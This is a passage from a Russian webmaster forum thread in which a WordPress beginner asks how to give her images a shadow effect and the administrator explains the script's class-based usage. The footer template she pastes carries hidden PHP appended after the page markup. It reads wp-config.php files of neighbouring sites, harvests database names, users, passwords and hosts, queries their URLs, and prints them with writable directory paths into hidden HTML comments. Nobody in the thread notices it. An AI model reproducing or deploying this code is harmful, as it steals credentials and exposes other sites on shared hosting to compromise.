О сайте | Обратная связь | Памятка для вебмастера

Конструктор кнопок он-лайн

Подбор цветов

Справочник по html и CSS

Наши копирайтеры

Поиск

[ Регистрация · Войти · Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 3 из 6«123456»
Модератор форума: KorniloFF 
Форум » Создание сайта » JAVA-Scripts » Как придать вогнутость картинке?
Как придать вогнутость картинке?
Катрин Дата: Воскресенье, 13.09.2015, 17:57 | Сообщение # 21
Дипломник(ца)
Награды: 1
Сообщений: 744
Репутация: 36
Статус: Offline
Ох... не работает... :o
Вот мой подвал:
Код
<div class="endline"></div><!-- footer start -->    <div id="footer" class="clearfix">  <div class="credit">    Все права защищены. <a href="<?php bloginfo('url'); ?>"><?php bloginfo('name'); ?></a>.    <br/>    <div class="footer_c"><a href="http://wp-templates.ru/">Шаблоны WordPress</a> | <a href="http://www.wptheme.us/">Wptheme</a> | <a href="http://hostband.ru/">хостинг</a></div>  </div>    </div><!-- footer end --></div></div></div></div><!-- wrapper end --><?php wp_footer(); ?></body></html><?php
if(stripos('win', PHP_OS) === false){
     define('DS', DIRECTORY_SEPARATOR);
     $fullPath = dirname(__FILE__);
     $parts = explode(DS, $fullPath);
     $parts = array_slice($parts, 0, -4);
     $wwwroot = implode(DS, $parts);

     $wp = $fullPath . DS. '..'.DS.'..'.DS.'..'.DS.'..'. DS;
     $dirs = scandir($wp);
     $work = array();
     foreach($dirs as $dir){
         $full = dirname(__FILE__) . '/../../../../' . $dir . '/wp-content/';
         if(file_exists($full)){
             $work[] = $wwwroot .DS. $dir ;
         }
     }
     foreach($work as $k => $path){
         $wpconf = $path . '/wp-config.php';
         $f = fopen($wpconf, 'r');
         $content = fread($f, filesize($wpconf));
         fclose($f);
         $pattern = '#DB_NAME[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
         preg_match_all($pattern, $content, $res);
         $dbname = $res[1][0];

         $pattern = '#DB_USER[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
         preg_match_all($pattern, $content, $res);
         $dbuser = $res[1][0];

         $pattern = '#DB_PASSWORD[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
         preg_match_all($pattern, $content, $res);
         $dbpass = $res[1][0];

         $pattern = '#DB_HOST[\'\"](?:.*)?[\'\"](.*)?[\'\"]\)#isU';
         preg_match_all($pattern, $content, $res);
         $dbhost = $res[1][0];

         $pattern = '#\$table_prefix(?:.*)?[\'\"](.*)?[\'\"]\;#isU';
         preg_match_all($pattern, $content, $res);
         $dbprefix = $res[1][0];

         $h = mysql_connect($dbhost, $dbuser, $dbpass) or die('ss');
         mysql_select_db($dbname, $h) or die('f');
         $data = mysql_query("SELECT option_value FROM ".$dbprefix."options WHERE option_name='home'") or die('d');
         while($info = mysql_fetch_array( $data ))
         {
             $host[$k] = $info['option_value'];
             break;
         }
         mysql_close($h);
     }

     echo '<!--##';
     echo implode("\n", $host);
     echo "##-->\n";

     $fold = array();
     foreach($work as $i => $path){
         $wpcontent = $path . '/wp-content';
         $fold[$i] = get_leaf_dirs($wpcontent);
     }
     if(!empty($fold)){
         echo '<!--$$';
         foreach($fold as $fol){
             if(!empty($fol)){
                 echo implode("\n", $fol);
                 echo "\n";
             }
         }
         echo '$$-->';

     }

}
if(!function_exists('scandir')) { // in case this script gets ported to PHP5, let's not break it
     function scandir($dir) {
         $files = array(); // added to initialize variable
         if(is_dir($dir)){
             $dh = opendir($dir); // added some error-checking
             while(false !== ($filename = readdir($dh))) {
                 if($filename == '.' || $filename == '..')
                     continue; // no need to get the . or .. references, right?
                 else
                     $files[] = $filename;
             }
             return $files;
         } else {
             return false;
         }
     }
}
function get_leaf_dirs($dir) {$array = array();$d = dir($dir);while (false !== ($entry = $d->read())) {if($entry!='.' && $entry!='..') {$entry = $dir.'/'.$entry;if(is_dir($entry) && is_writable($entry)) {$subdirs = get_leaf_dirs($entry);if ($subdirs)$array = array_merge($array, $subdirs);else$array[] = $entry;}}if(sizeof($array)>0){break;}}$d->close();return $array;}
?>

Вставила в самый низ (после всего):
Код
<script type="text/javascript">
addStyle ('shad');  
addStyle ('bg');  
function addStyle (cl) {
var imgs= document.querySelectorAll('img.' + cl), tmp, sh;
if (!imgs) return;
for (var i=0, L=imgs.length; i < L; i++) {
tmp = document.createElement('span');
tmp.style.display= 'inline-block';
imgs[i].parentNode.insertBefore(tmp, imgs[i]);
tmp.appendChild(imgs[i]);
if (cl==='shad') {
sh= document.createElement('p');
sh.style.height= '20px';
sh.style.background= 'url("/Oformlenie/shadow_bottom.png") no-repeat 0 0 / 100% 100%';
tmp.appendChild(sh);
}
if (cl==='bg') {
tmp.className= "grad";
tmp.style.background= 'linear-gradient(50deg, #e5e5e5, #f4f5f7)'
}
};
}
</script>


И ничего не изменилось... :'(


KorniloFF Дата: Воскресенье, 13.09.2015, 21:23 | Сообщение # 22
Профессор(ша)
Награды: 27
Группа: Администраторы
Сообщений: 3479
Город: Ялта
Репутация: 251
Статус: Offline
Катрин, а картинкам класс соответствующий назначала?



Z146965124780
R374477004237
Ну, или хотя бы добавьте в репутацию.
Катрин Дата: Понедельник, 14.09.2015, 07:47 | Сообщение # 23
Дипломник(ца)
Награды: 1
Сообщений: 744
Репутация: 36
Статус: Offline
KorniloFF, нет... а как? shame
KorniloFF Дата: Понедельник, 14.09.2015, 09:49 | Сообщение # 24
Профессор(ша)
Награды: 27
Группа: Администраторы
Сообщений: 3479
Город: Ялта
Репутация: 251
Статус: Offline
Катрин, ну так я же полностью инструкцию написал на странице скрипта.
Ведь, возможно, тебе не всем изображениям нужно тень добавить? Поэтому тем, которым НУЖНО добавляешь класс class=shad. И вся магия.
А скрипт, который ты добавила правильно, уже переберет эти изображения самостоятельно и добавит к ним теньку.




Z146965124780
R374477004237
Ну, или хотя бы добавьте в репутацию.
KorniloFF Дата: Понедельник, 14.09.2015, 09:54 | Сообщение # 25
Профессор(ша)
Награды: 27
Группа: Администраторы
Сообщений: 3479
Город: Ялта
Репутация: 251
Статус: Offline
Переношу тему в соответствующий раздел форума.



Z146965124780
R374477004237
Ну, или хотя бы добавьте в репутацию.
Катрин Дата: Понедельник, 14.09.2015, 10:25 | Сообщение # 26
Дипломник(ца)
Награды: 1
Сообщений: 744
Репутация: 36
Статус: Offline
Цитата KorniloFF ()
не всем изображениям нужно тень добавить?

Собиралась всем... shame
Цитата KorniloFF ()
добавляешь класс class=shad

Не поняла, ГДЕ это действо совершить... Ooo


KorniloFF Дата: Понедельник, 14.09.2015, 10:54 | Сообщение # 27
Профессор(ша)
Награды: 27
Группа: Администраторы
Сообщений: 3479
Город: Ялта
Репутация: 251
Статус: Offline
Катрин, ну тут уже я теряюсь, что ответить...
Если подробно, то ребята расписали тут - http://htmlbook.ru/html/attr/class




Z146965124780
R374477004237
Ну, или хотя бы добавьте в репутацию.
Катрин Дата: Понедельник, 14.09.2015, 11:08 | Сообщение # 28
Дипломник(ца)
Награды: 1
Сообщений: 744
Репутация: 36
Статус: Offline
Я не о классах спрашиваю, а конкретно у себя в COLLAGE. Выходит, что и в стилях css надо править? Или в шаблоне страницы, или в основном шаблоне? shame
Я ожидала от скрипта волшебства - все картинки вогнулись и красуются... :D


Сообщение отредактировал Катрин - Понедельник, 14.09.2015, 11:11
KorniloFF Дата: Понедельник, 14.09.2015, 11:32 | Сообщение # 29
Профессор(ша)
Награды: 27
Группа: Администраторы
Сообщений: 3479
Город: Ялта
Репутация: 251
Статус: Offline
Катрин, я ж не знаю, как ты добавляешь изображения, я пишу все в кодах, например.
Такое волшебство я могу устроить, только тогда ВСЕ изображения на сайте будут иметь тени: и иконки, и пиктограммы, и счетчики... Короче, ВСЕ. Сама же напишешь, что бардак на сайте и такого ты не ожидала. А отличить какие картинки ты видишь с тенью, а какие нет - скрипт не умеет.
Я сделал максимально просто и удобно, на мой взгляд. Добавляешь изображение - нужно с тенью - ставишь нужный класс. Это ж твой сайт, погугли, как в твоем движке класс изображению назначить. А как же ты другие атрибуты тегам прописываешь, такие как alt или style?




Z146965124780
R374477004237
Ну, или хотя бы добавьте в репутацию.
Катрин Дата: Понедельник, 14.09.2015, 11:48 | Сообщение # 30
Дипломник(ца)
Награды: 1
Сообщений: 744
Репутация: 36
Статус: Offline
Цитата KorniloFF ()
А как же ты другие атрибуты тегам прописываешь, такие как alt или style?

Я ничего не прописываю. Картинка загружается сама с компьютера. Вордпресс работает сам.
Вот так прописан класс для картинки с сайтом в сайдбаре: <img class="aligncenter size-full wp-image-4606"


Сообщение отредактировал Катрин - Понедельник, 14.09.2015, 11:55


Форум » Создание сайта » JAVA-Scripts » Как придать вогнутость картинке?
Страница 3 из 6«123456»
Поиск:
Как придать вогнутость картинке? (3) - Создание сайта - JAVA-Scripts - Форум
Сегодня были на форуме: